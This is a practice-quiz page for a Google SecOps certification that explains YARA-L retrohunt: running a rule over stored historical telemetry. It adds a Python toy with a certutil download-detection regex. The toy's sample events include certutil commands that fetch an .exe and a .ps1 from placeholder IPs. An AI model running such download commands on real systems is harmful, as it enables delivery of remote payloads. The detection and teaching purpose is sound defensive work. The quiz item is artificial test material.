In threat hunting with YARA-L, what is retrohunt used for?

Prepare for the Google SecOps Professional Engineer Test with our interactive quiz. Utilize flashcards and multiple-choice questions with hints and explanations to boost your readiness and confidence.

Multiple Choice

In threat hunting with YARA-L, what is retrohunt used for?

Explanation:
Retrohunt runs a YARA-L rule against telemetry that Google SecOps has already ingested, over a time range you choose, instead of against the live event stream. It lets you look back through stored data for past matches to the indicators or behaviors the rule describes, uncovering earlier infections, persistence, or campaign activity that went unnoticed because no rule existed to catch it at the time. You write a YARA-L rule describing the artifacts or behaviors of interest, launch a retrohunt for that rule over the chosen window, and the search scans the historical events and returns detections with timestamps, hosts, and the matched events as context. Because it only sees data that was ingested and is still retained, a retrohunt cannot surface activity from sources that were not being collected at the time. This makes retrohunt essential for building timelines and spotting long-tail activity, as opposed to searching only current live data or enabling the rule to generate a real-time alert feed.

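To make the live-versus-historical distinction concrete, here is an added worked example (not from the quiz page and not Google SecOps code): a toy Python model of a retrohunt. A hypothetical YARA-L rule for certutil download abuse is shown in a comment, its matching logic is re-implemented in Python, and the rule is evaluated over a constructed, UDM-style store of past events within a caller-chosen time window, grouping hits per host in one-hour buckets the way a `match: $host over 1h` clause would. The rule name, field values and sample events are all invented for illustration.

```python
"""Toy model of a YARA-L retrohunt: a rule's logic evaluated over stored,
historical events in a chosen window, rather than over the live stream."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Hypothetical YARA-L 2.0 rule this example mirrors (an assumption, not from the page):
#
#   rule certutil_urlcache_download {
#     meta:
#       description = "certutil used with -urlcache to fetch a remote file"
#       severity = "MEDIUM"
#     events:
#       $e.metadata.event_type = "PROCESS_LAUNCH"
#       re.regex($e.target.process.command_line, `certutil(\.exe)?\s+.*-urlcache`)
#       $host = $e.principal.hostname
#     match:
#       $host over 1h
#     condition:
#       $e
#   }

CMDLINE_RE = re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.IGNORECASE)


def ts(s: str) -> datetime:
    """Parse an ISO-8601 timestamp as UTC."""
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed sample events in a flattened UDM-like shape; not real telemetry.
HISTORICAL_EVENTS = [
    {"metadata.event_timestamp": ts("2024-03-02T08:15:00"), "metadata.event_type": "PROCESS_LAUNCH",
     "principal.hostname": "ws-finance-07",
     "target.process.command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/x.txt x.exe"},
    {"metadata.event_timestamp": ts("2024-03-02T08:20:00"), "metadata.event_type": "PROCESS_LAUNCH",
     "principal.hostname": "ws-finance-07",
     "target.process.command_line": "cmd.exe /c whoami"},
    {"metadata.event_timestamp": ts("2024-03-18T23:41:00"), "metadata.event_type": "PROCESS_LAUNCH",
     "principal.hostname": "srv-build-02",
     "target.process.command_line": "CertUtil -urlcache -f http://198.51.100.4/a.ps1 a.ps1"},
    {"metadata.event_timestamp": ts("2024-03-18T23:42:00"), "metadata.event_type": "NETWORK_CONNECTION",
     "principal.hostname": "srv-build-02",
     "target.process.command_line": ""},
    {"metadata.event_timestamp": ts("2024-04-05T10:00:00"), "metadata.event_type": "PROCESS_LAUNCH",
     "principal.hostname": "ws-hr-03",
     "target.process.command_line": "certutil -verify cert.cer"},
]


@dataclass(frozen=True)
class Detection:
    host: str
    window_start: datetime
    event_count: int


def rule_matches(event: dict) -> bool:
    """The rule's `events:` section: process launch whose command line matches the regex."""
    return (event.get("metadata.event_type") == "PROCESS_LAUNCH"
            and CMDLINE_RE.search(event.get("target.process.command_line", "")) is not None)


def retrohunt(events, start: datetime, end: datetime,
              match_window: timedelta = timedelta(hours=1)) -> list[Detection]:
    """Evaluate the rule over stored events with timestamps in [start, end) and
    group matches per host into fixed buckets of `match_window` (the `over 1h` part)."""
    buckets: dict[tuple[str, datetime], int] = {}
    secs = match_window.total_seconds()
    for ev in sorted(events, key=lambda e: e["metadata.event_timestamp"]):
        t = ev["metadata.event_timestamp"]
        if not (start <= t < end) or not rule_matches(ev):
            continue
        epoch = t.timestamp()
        bucket_start = datetime.fromtimestamp(epoch - epoch % secs, tz=timezone.utc)
        key = (ev["principal.hostname"], bucket_start)
        buckets[key] = buckets.get(key, 0) + 1
    return [Detection(h, b, n) for (h, b), n in sorted(buckets.items(), key=lambda kv: kv[0][1])]


def demo() -> tuple[list[Detection], list[Detection]]:
    """Suppose the rule was only deployed live on 2024-04-01: live evaluation sees
    events from then on, while a retrohunt over the previous quarter finds the earlier hits."""
    deployed_at = ts("2024-04-01T00:00:00")
    live_hits = retrohunt(HISTORICAL_EVENTS, deployed_at, ts("2024-05-01T00:00:00"))
    retro_hits = retrohunt(HISTORICAL_EVENTS, ts("2024-01-01T00:00:00"), deployed_at)
    return live_hits, retro_hits


if __name__ == "__main__":
    live, retro = demo()
    print("live detections since deployment:", live)      # []
    print("retrohunt detections before deployment:", retro)
```

The point the toy makes is the one the explanation describes: the same rule logic, run over the retained historical store with an explicit time range, surfaces the two March downloads that a rule enabled in April would never have alerted on. In the real product you would author the YARA-L rule and start a retrohunt for it over the window of interest rather than re-implementing the matching yourself.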
